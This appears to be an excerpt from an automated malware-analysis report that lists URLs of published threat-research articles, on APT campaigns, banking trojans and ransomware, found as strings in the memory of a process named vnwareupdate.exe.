Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/fPowerStager
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/iPowerStager
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/oPowerStager
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/sPowerStager
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/tPowerStager
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/uPowerStager
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/usPowerStager
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/wPowerStager
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/xPowerStager
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-a
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-aKovter
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-aThe
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-mi
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-cus
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukr
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entiti
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-servic
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-u
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-t
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmini
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://s.tencent.com/research/report/471.html
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://sec0wn.blogspot.ae/2017/10/knock-knock-knocking-on-ehdoor-curious.html
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://sec0wn.blogspot.ae/2017/10/knock-knock-knocking-on-ehdoor-curious.htmlKnock
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://sec0wn.blogspot.ae/2017/10/knock-knock-knocking-on-ehdoor-curious.htmlSurtr:
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://sec0wn.blogspot.ae/2017/10/knock-knock-knocking-on-ehdoor-curious.htmlThreat
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.htm
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.htmContinued
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.htmThe
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/78674/sambacry-is-coming/
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/0A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/1A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/2A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/3A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/5A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/6A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/6SamSam
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/7A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/8A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/9A
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/A
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/MA
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/SA
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/Sample
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/Sednit
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/bA
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/cA
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/fA
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/a-slice-of-2017-sofacy-activity/83930/s
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/36462/stuxnetduqu-the-evolution-of-
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsin
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsin.p
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsin8
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinWinnti
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69953/the-naikon-apt/
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69953/the-naikon-apt/Citadel
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69953/the-naikon-apt/GlobeImposter
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/69953/the-naikon-apt/The
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/72087/the-shade-encryptor-a-double-
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/analysis/publications/72356/i-am-hdroot-part-2/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/apt-slingshot/84312/
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/apt-slingshot/84312/.
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/apt-slingshot/84312/Bronze
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/apt-slingshot/84312/SlingShot
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/apt-trends-report-q2-2017/79332/Dridex
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/apt-trends-report-q2-2017/79332/Greenbugs
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/atm-malware-from-latin-america-to-the-world/83836/
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/atm-malware-from-latin-america-to-the-world/83836/18Bingo
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/atm-malware-from-latin-america-to-the-world/83836/5fInside
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/atm-malware-from-latin-america-to-the-world/83836/6cBingo
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/The
Source: vnwareupdate.exe, 00000003.00000003.238209992.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-d
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-dNew
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/33208/new-version-of-osx-sabpub-confirmed-
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/57647/the-red-october-campaign/
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/57647/the-red-october-campaign/IXESHE
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/57647/the-red-october-campaign/MyKings
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/57647/the-red-october-campaign/Temp.Periscope
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/57647/the-red-october-campaign/The
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/75812/the-equation-giveaway/
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/8
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/LockPoS
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/The
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/66108/el-machete/
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/66108/el-machete/10El
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/66108/el-machete/11023296f88f88bbb77d579f5fbad02e064274264c5066
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/66108/el-machete/El
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/66108/el-machete/dEl
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-t
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68350/the-syrian-malware-part-2-who-is-the-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68350/the-syrian-malware-part-2-who-is-the-.
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68350/the-syrian-malware-part-2-who-is-the-Syrian
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68350/the-syrian-malware-part-2-who-is-the-Tibetan
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-l
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-lLegspin
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-lOilRig
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-lSkeleton
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-ga
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-gaThe
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-pla
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-plaEquationDrug
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-plaOperation
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-plaSpam
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70087/grabit-and-the-rats/8
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70087/grabit-and-the-rats/APT
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70087/grabit-and-the-rats/Grabit
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70087/grabit-and-the-rats/Trojan.Win32.Banker.NWT
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticat
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticatTheDuqu
Source: vnwareupdate.exe, 00000003.00000003.245855228.00000000039E7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70726/the-spring-dragon-apt/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70726/the-spring-dragon-apt/APT1:
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70991/games-are-over/
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70991/games-are-over/Communities
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70991/games-are-over/Dino
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/70991/games-are-over/Naoinstalad
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threa
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threaStrider:
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threaWild
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/(APT-C-23)
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/Jamieoliver
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/New
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-contr
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-contrOngoing
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-contrSatellite
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-contrTargeted
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72187/coinvault-are-we-reaching-the-end-of-
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72283/gaza-cybergang-wheres-your-ir-team/
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-Duke
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-Sofacy
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/73503/from-linux-to-windows-new-family-of-c
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/73866/atmzombie-banking-trojan-in-israeli-w
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/73866/atmzombie-banking-trojan-in-israeli-wATMZombie:
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/73866/atmzombie-banking-trojan-in-israeli-wLocky
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/74063/the-return-of-hackingteam-with-new-im
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/74063/the-return-of-hackingteam-with-new-imOngoing
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/74063/the-return-of-hackingteam-with-new-imThe
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/75040/lurk-banker-trojan-exclusively-for-ru
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/75328/the-dropping-elephant-actor/
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/75384/lurk-a-danger-where-you-least-expect-
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/76318/crypy-ransomware-behind-israeli-lines
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-fr
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-frIlluminating
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-frKopiLuwak:
